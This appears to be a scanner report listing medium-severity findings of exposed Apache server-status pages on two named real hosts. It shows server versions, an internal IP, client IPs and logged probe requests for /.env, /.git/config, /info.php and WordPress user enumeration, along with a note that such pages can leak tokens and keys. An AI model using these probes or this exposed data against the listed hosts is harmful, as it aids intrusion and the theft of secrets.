1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871R 131.042170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.851180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.570170.028.383393.79 2.18.255.105http/1.1 2-0517550/825/102950_ 131.06210.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02000.023.903349.39 2.18.255.73http/1.1 2-0517550/819/103075_ 131.040840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28000.035.343287.32 2.18.255.105http/1.1 2-0517550/858/103204_ 130.960730.024.213330.72 2.18.255.73http/1.1 2-0517550/833/102666_ 131.14100.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060_ 130.960690.025.363188.87 2.18.255.73http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15190.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10100.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.091110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0712630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/10
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5971875bdb9
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:49 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 43 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911925 - Total Traffic: 388.3 GB CPU Usage: u2713.89 s281.29 cu0 cs0 - .0804% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 15 requests currently being processed, 183 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no19yes5130150 1111644no9yes315071 222903no2yes018020 3107167no4yes018040 4112229no2yes018020 5121144no3yes018030 667151no8yes117062 918565no1yes018010 1136524no7yes018070 1436768no4yes513000 1542031no5yes117040 Sum11064 151830513 _R_R_____W____W__R_____________R__RW____________________________ ____________________________________________________________W_.. ..................................__________________............ ......__________________...................................._R__ ______R__RR__RR_________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447_ 0.36000.00.001872.59 95.101.88.100http/1.1 0-0192160/1/54507R 0.17300.00.001628.05 73.18.195.9http/1.1 0-0192160/4/54369_ 0.54010.00.001762.17 96.7.74.198http/1.1 0-0192160/6/54409R 0.600270.00.051798.26 95.101.88.126http/1.1localhost:80GET /server-status HTTP/1.1 0-0192160/3/54477_ 0.49010.00.011693.14 95.101.88.100http/1.1 0-0192160/3/54343_ 0.46000.00.001621.91 96.7.74.198http/1.1 0-0192160/6/54726_ 0.580200.00.031745.07 95.101.88.100http/1.1 0-0192160/4/54375_ 0.51000.00.001721.30 95.101.88.100http/1.1 0-0192160/3/54494_ 0.40000.00.011605.35 96.7.74.198http/1.1 0-0192160/3/54386W 0.52000.00.001718.61 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/2/54486_ 0.48000.00.001766.88 95.101.88.126http/1.1 0-0192160/6/54381_ 0.51000.00.011645.23 95.101.88.100http/1.1 0-0192160/2/54320_ 0.56000.00.001768.49 95.101.88.100http/1.1 0-0192160/1/54534_ 0.37000.00.001721.76 96.7.74.198http/1.1 0-0192160/1/54342W 0.37000.00.001737.58 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/1/54403_ 0.43000.00.001704.83 95.101.88.126http/1.1 0-0192160/4/54450_ 0.510620.00.041695.85 95.101.88.45http/1.1 0-0192160/3/54334R 0.44000.00.001783.77 96.7.74.198http/1.1 1-01116440/252/55617_ 22.93000.013.161759.70 95.101.88.100http/1.1 1-01116440/252/55320_ 23.10000.012.701702.85 95.101.88.126http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/250/55455_ 22.99010.07.411705.27 95.101.88.126http/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 95.101.88.100http/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 95.101.88.100http/1.1 1-01116440/257/55496_ 23.10000.01.571725.63 95.101.88.100http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/240/55541_ 23.04000.010.151685.08 95.101.88.126http/1.1localhost:80GET / HTTP/1.1 1-01116440/232/55681_ 22.99000.09.711649.16 95.101.88.126http/1.1 1-01116440/247/55840_ 23.0801370.02.801730.25 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.126http/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 95.101.88.100http/1.1 1-01116440/253/55419_ 23.01000.04.231690.69 96.7.74.198http/1.1 1-01116440/243/55453_ 22.96000.09.401606.63 95.101.88.100http/1.1 1-01116440/238/55365R 22.96000.09.541786.53 95.101.88.100http/1.1 1-01116440/235/55277_ 23.020490.04.191645.66 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 1-01116440/248/55605_ 23.10000.013.021701.07 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 1-01116440/245/55294R 22.96000.01.661699.34 95.101.88.100http/1.1 1-01116440/237/55351W 23.02000.08.211679.77 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/822/59596_ 109.93210.036.611946.19 95.101.88.100http/1.1 2-0229030/860/59772_ 110.15100.045.221932.58 95.101.88.126http/1.1localhost:80GET /login.action HTTP/1.1 2-0229030/824/59555_ 110.19000.051.801915.17 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-0229030/859/60104_ 110.14100.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93000.044.241872.87 96.7.74.198http/1.1 2-0229030/820/59820_ 110.16000.045.341928.60 95.101.88.100http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0229030/839/59997_ 109.810170.045.231876.02 95.101.88.45http/1.1 2-0229030/842/59781_ 109.96010.048.081881.13 95.101.88.100http/1.1 2-0229030/812/59781_ 110.16000.062.191860.43 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 2-0229030/837/59810_ 110.01000.049.021853.86 95.101.88.126http/1.1 2-0229030/838/59649_ 109.91000.054.491908.23 95.101.88.100http/1.1 2-0229030/863/59893_ 110.16010.030.271826.50 95.101.88.126http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/811/59582_ 109.820190.039.921824.04 95.101.88.126http/1.1 2-0229030/845/60028_ 110.16000.051.681859.50 95.101.88.100http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/846/59852_ 110.151
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5974df02f99
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:48 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911869 - Total Traffic: 388.3 GB CPU Usage: u2713.38 s281.24 cu0 cs0 - .0804% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 27 requests currently being processed, 171 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no26yes1170171 1111644no17yes2160105 222903no2yes414020 3107167no5yes315040 4112229no2yes117020 5121144no3yes018030 667151no11yes018064 918565no1yes018010 1136524no7yes018070 1436768no1yes117000 1542031no5yes513030 Sum11080 2717105510 _RR_RR___RR_RRRRR__________R__R___________RR__R_____R________R__ R_____W________________R______________________________________.. ..................................__________________............ ......__________________....................................____ _R_____________R_R___R____R__R__................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447R 0.36000.00.001872.59 95.101.88.126http/1.1 0-0192160/1/54507R 0.17200.00.001628.05 73.18.195.9http/1.1 0-0192160/3/54368R 0.38000.00.001762.17 95.101.88.100http/1.1 0-0192160/5/54408_ 0.44000.00.031798.24 95.101.88.100http/1.1crm.sprout.online:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/2/54476R 0.29000.00.001693.14 95.101.88.126http/1.1 0-0192160/2/54342R 0.37000.00.001621.91 164.92.240.121http/1.1client.simplismarter.com:443 0-0192160/4/54724_ 0.46000.00.011745.05 95.101.88.126http/1.1trmm.us:80GET /.env HTTP/1.1 0-0192160/2/54373W 0.40000.00.001721.29 95.101.88.100http/1.1trmm.us:80GET /info.php HTTP/1.1 0-0192160/3/54494_ 0.40000.00.011605.35 95.101.88.126http/1.1 0-0192160/2/54385R 0.37000.00.001718.61 95.101.88.126http/1.1 0-0192160/1/54485R 0.37000.00.001766.88 95.101.88.100http/1.1 0-0192160/3/54378_ 0.44000.00.001645.23 95.101.88.100http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0192160/1/54319R 0.37000.00.001768.49 95.101.88.126http/1.1 0-0192160/1/54534R 0.37000.00.001721.76 95.101.88.100http/1.1 0-0192160/1/54342R 0.37000.00.001737.58 95.101.88.126http/1.1 0-0192160/1/54403R 0.43000.00.001704.83 95.101.88.126http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/3/54449R 0.43000.00.041695.85 95.101.88.100http/1.1localhost:80GET /.git/config HTTP/1.1 0-0192160/3/54334_ 0.44000.00.001783.77 95.101.88.100http/1.1crm.sprout.online:80GET /info.php HTTP/1.1 1-01116440/252/55617_ 22.93000.013.161759.70 95.101.88.126http/1.1 1-01116440/251/55319_ 22.99000.012.701702.85 95.101.88.126http/1.1crm.sprout.online:80GET /telescope/requests HTTP/1.1 1-01116440/250/55455_ 22.99010.07.411705.27 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 95.101.88.100http/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 95.101.88.100http/1.1 1-01116440/256/55495_ 23.010600.01.571725.63 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 1-01116440/239/55540_ 22.98000.010.151685.08 95.101.88.100http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/232/55681_ 22.99000.09.711649.16 95.101.88.126http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/246/55839_ 22.98010.02.761730.21 95.101.88.100http/1.1trmm.us:80GET / HTTP/1.1 1-01116440/240/55605R 22.95000.04.121667.85 95.101.88.126http/1.1crm.sprout.online:80GET /server-status HTTP/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 95.101.88.100http/1.1 1-01116440/253/55419_ 23.01000.04.231690.69 95.101.88.100http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/243/55453R 22.96000.09.401606.63 95.101.88.126http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/238/55365_ 22.96000.09.541786.53 95.101.88.100http/1.1localhost:80GET /telescope/requests HTTP/1.1 1-01116440/234/55276_ 22.97000.04.191645.66 95.101.88.100http/1.1localhost:80GET /login.action HTTP/1.1 1-01116440/247/55604_ 22.91000.013.021701.07 95.101.88.126http/1.1 1-01116440/245/55294_ 22.96000.01.661699.34 95.101.88.100http/1.1localhost:80GET /.git/config HTTP/1.1 1-01116440/236/55350_ 22.91000.08.211679.77 95.101.88.100http/1.1 2-0229030/822/59596_ 109.93110.036.611946.19 95.101.88.100http/1.1 2-0229030/860/59772_ 110.15000.045.221932.58 95.101.88.126http/1.1localhost:80GET /login.action HTTP/1.1 2-0229030/823/59554_ 110.08200.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93200.044.241872.87 95.101.88.126http/1.1 2-0229030/820/59820_ 110.16000.045.341928.60 95.101.88.100http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0229030/839/59997R 109.813170.045.231876.02 95.101.88.100http/1.1 2-0229030/842/59781R 109.96310.048.081881.13 95.101.88.126http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 2-0229030/812/59781_ 110.16000.062.191860.43 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 2-0229030/837/59810_ 110.01300.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649R 109.91300.054.491908.23 95.101.88.100http/1.1 2-0229030/863/59893_ 110.16010.030.271826.50 95.101.88.126http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/81
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab91556330659b4
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 06:19:28 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 12 hours 31 minutes 6 seconds Server load: 1.03 0.83 0.42 Total accesses: 268187 - Total Traffic: 15.3 GB CPU Usage: u588.17 s104.53 cu0 cs0 - .0696% CPU load .269 requests/sec - 16.1 kB/second - 59.7 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no0yes018000 2127655no2yes117020 39765no0yes018000 4106151no0yes018000 5123272no0yes018000 619783no0yes018000 79491no0yes018000 85337no0yes018000 949846no0yes018000 Sum1002 1179020 ______________________________________________W_________________ ________________________________________________________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/428/955_ 140.4737100.07.2832.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2653425904389 HT 0-0100440/414/944_ 140.5219100.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2653606048144 HT 0-0100440/412/925_ 140.0847400.05.589.10 127.0.0.1http/1.1 0-0100440/428/943_ 140.4019100.06.847.82 127.0.0.1http/1.1 0-0100440/404/922_ 140.1437100.02.374.09 127.0.0.1http/1.1 0-0100440/430/956_ 140.2159400.09.7111.52 127.0.0.1http/1.1 0-0100440/406/913_ 140.3836500.02.863.93 127.0.0.1http/1.1 0-0100440/388/931_ 140.5125100.02.443.35 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2653546001142 HT 0-0100440/392/897_ 140.3925110.02.924.89 127.0.0.1http/1.1 0-0100440/415/956_ 140.1145900.05.567.47 127.0.0.1http/1.1 0-0100440/389/919_ 140.4641410.06.618.13 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/396/898_ 140.4112910.07.027.86 127.0.0.1http/1.1 0-0100440/399/919_ 140.4351910.05.176.03 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/409/939_ 140.4447410.02.463.48 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/429/945_ 140.5412910.02.213.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/420/944_ 140.2251910.05.927.56 127.0.0.1http/1.1 0-0100440/427/938_ 140.1341400.08.629.88 127.0.0.1http/1.1 0-0100440/404/925_ 140.4545910.02.014.11 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/172/686_ 46.3027810.02.386.80 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/183/712_ 46.3221830.01.373.61 193.35.18.77http/1.1hbroside.com:443GET / HTTP/1.1 1-01148460/191/735_ 45.8727810.05.017.79 127.0.0.1http/1.1 1-01148460/177/708_ 46.268410.03.104.60 127.0.0.1http/1.1 1-01148460/188/714_ 45.9321810.03.085.85 193.35.18.77http/1.1 1-01148460/181/708_ 46.229900.03.316.98 168.143.243.15http/1.1 1-01148460/175/694_ 45.389910.01.575.14 168.143.243.15http/1.1 1-01148460/179/733_ 46.024400.00.534.91 127.0.0.1http/1.1 1-01148460/184/718_ 46.3123410.01.393.59 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/194/685_ 45.3030810.00.632.21 127.0.0.1http/1.1 1-01148460/175/695_ 43.6839190.03.215.20 127.0.0.1http/1.1 1-01148460/186/706_ 46.2930810.00.675.76 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/196/730_ 46.1028510.02.296.35 127.0.0.1http/1.1 1-01148460/176/697_ 46.373910.02.373.58 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/196/715_ 46.3027910.00.484.06 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/180/691_ 46.1824510.03.105.69 127.0.0.1http/1.1 1-01148460/184/711_ 46.1227910.03.086.80 127.0.0.1http/1.1 1-01148460/185/723_ 45.1323400.02.515.11 127.0.0.1http/1.1 2-01276550/40/572_ 3.48810.00.034.69 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/45/571_ 3.36810.00.043.40 127.0.0.1http/1.1 2-01276550/33/531_ 3.41410.00.022.75 127.0.0.1http/1.1 2-01276550/40/554_ 3.4921180.00.113.80 96.7.74.135http/1.1crm.sprout.online:443GET / HTTP/1.1 2-01276550/42/546_ 3.4911110.00.105.87 96.7.74.135http/1.1crm.sprout.online:443GET / HTTP/1.1 2-01276550/38/549_ 3.49000.00.048.64 96.7.74.190http/1.1crm.sprout.online:443GET /.vscode/sftp.json HTTP/1.1 2-01276550/41/530_ 3.49000.00.045.75 96.7.74.190http/1.1crm.sprout.online:443GET /debug/default/view?panel=config HTTP/1.1 2-01276550/40/583_ 3.49000.00.032.31 96.7.74.190http/1.1crm.sprout.online:443GET /about HTTP/1.1 2-01276550/38/560_ 3.50000.00.032.53 96.7.74.190http/1.1crm.sprout.online:443GET /v2/_catalog HTTP/1.1 2-01276550/45/549_ 3.50000.00.052.26 96.7.74.190http/1.1crm.sprout.online:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-01276550/38/529W 3.47000.00.032.18 96.7.74.190http/1.1crm.sprout.online:443GET /server-status HTTP/1.1 2-01276550/41/563_ 3.472410.00.073.21 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/37/547_ 3.423810.00.036.37 127.0.0.1http/1.1 2-01276550/42/539_ 3.432400.00.042.34 127.0.0.1http/1.1 2-01276550/44/528_ 3.432310.00.033.85 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab9155654f493be
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 05:13:16 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 11 hours 24 minutes 55 seconds Server load: 0.00 0.00 0.06 Total accesses: 267397 - Total Traffic: 15.3 GB CPU Usage: u578.53 s102.61 cu0 cs0 - .0687% CPU load .27 requests/sec - 16.2 kB/second - 59.9 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no0yes018000 2127655no0yes018000 39765no1yes117010 4106151no0yes018000 5123272no0yes018000 619783no1yes018010 79491no0yes018000 85337no0yes018000 949846no1yes018001 Sum1003 1179021 ______________________________________________________________W_ ________________________________________________________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/422/949_ 139.1622210.07.2832.85 127.0.0.1http/1.1 0-0100440/410/940_ 139.3442300.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649403196209 HT 0-0100440/410/923_ 139.3832710.05.589.10 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/423/938_ 139.1942300.06.837.81 127.0.0.1http/1.1 0-0100440/402/920_ 139.4218200.02.374.09 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649643367232 HT 0-0100440/427/953_ 139.3636300.09.7111.52 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649463212128 HT 0-0100440/401/908_ 139.1718200.02.863.93 127.0.0.1http/1.1 0-0100440/385/928_ 139.454210.02.443.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/387/892_ 139.184210.02.924.89 127.0.0.1http/1.1 0-0100440/413/954_ 139.3830300.05.557.47 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649523272267 HT 0-0100440/383/913_ 139.1530300.06.618.12 127.0.0.1http/1.1 0-0100440/391/893_ 139.2038700.07.017.86 127.0.0.1http/1.1 0-0100440/395/915_ 139.2136310.05.166.02 127.0.0.1http/1.1 0-0100440/405/935_ 139.2235700.02.463.48 127.0.0.1http/1.1 0-0100440/425/941_ 139.3638710.02.213.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/416/940_ 139.3635710.05.917.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/425/936_ 139.4022210.08.629.88 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/398/919_ 139.2632700.02.004.10 127.0.0.1http/1.1 1-01148460/170/684_ 45.1159100.02.376.80 135.125.246.110http/1.1localhost:80POST / HTTP/1.1 1-01148460/180/709_ 44.9751310.01.363.60 128.199.213.167http/1.1 1-01148460/189/733_ 44.9259110.05.017.79 135.125.246.110http/1.1 1-01148460/174/705_ 43.8134210.03.094.59 127.0.0.1http/1.1 1-01148460/187/713_ 45.1351100.03.085.85 128.199.213.167http/1.1localhost:80GET /bundle.js HTTP/1.1 1-01148460/178/705_ 45.1834210.03.296.97 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/174/693_ 44.9951010.01.575.14 128.199.213.167http/1.1 1-01148460/177/731_ 45.2314910.00.524.91 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/181/715_ 44.9252310.01.393.58 127.0.0.1http/1.1 1-01148460/193/684_ 45.0870210.00.632.21 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/175/695_ 43.68857190.03.215.20 96.7.74.190http/1.1 1-01148460/182/702_ 45.0579000.00.675.75 47.128.123.38http/1.1trmm.us:443GET / HTTP/1.1 1-01148460/194/728_ 44.2470210.02.286.35 127.0.0.1http/1.1 1-01148460/173/694_ 44.8114910.02.363.58 127.0.0.1http/1.1 1-01148460/193/712_ 45.0966300.00.474.05 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2649163048325 HT 1-01148460/178/689_ 45.135241330.03.105.69 23.205.108.88http/1.1trmm.us:443GET /public/mms/20231003_155400_UTC_6f3f0ab561_0.png HTTP/1.1 1-01148460/181/708_ 44.9166310.03.076.80 127.0.0.1http/1.1 1-01148460/185/723_ 45.1351300.02.515.11 128.199.213.167http/1.1localhost:80GET /upl.php HTTP/1.1 2-01276550/18/550_ 1.837410.00.024.67 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/26/552_ 1.797410.00.023.38 127.0.0.1http/1.1 2-01276550/15/513_ 1.846200.00.012.73 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649763457956 HT 2-01276550/22/536_ 1.806210.00.023.72 127.0.0.1http/1.1 2-01276550/20/524_ 1.844410.00.025.79 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/19/530_ 1.814410.00.028.62 127.0.0.1http/1.1 2-01276550/20/509_ 1.852910.00.015.72 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/20/563_ 1.812910.00.012.29 127.0.0.1http/1.1 2-01276550/22/544_ 1.852710.00.022.52 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/20/524_ 1.812700.00.012.23 127.0.0.1http/1.1 2-01276550/22/513_ 1.861410.00.022.17 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/21/543_ 1.821410.00.053.18 127.0.0.1http/1.1 2-01276550/19/529_ 1.861210.00.016.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/22/519_ 1.821210.00.022.32 127.0.0.1http/1.1 2-01276550/25/509_ 1.8720
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab91556a63a3f06
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:07 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 45 seconds Server load: 1.12 0.80 0.33 Total accesses: 465 - Total Traffic: 7.3 MB CPU Usage: u4.28 s.51 cu0 cs0 - .477% CPU load .463 requests/sec - 7.4 kB/second - 16.0 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no3yes018012 6106024no0yes018000 7106043no1yes018010 8106065no3yes117020 9107415no0yes018000 Sum1008 1179052 ________________________________________________________________ ________________________________________________________________ ___________________________W________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016890.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516500.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516510.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279310.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto 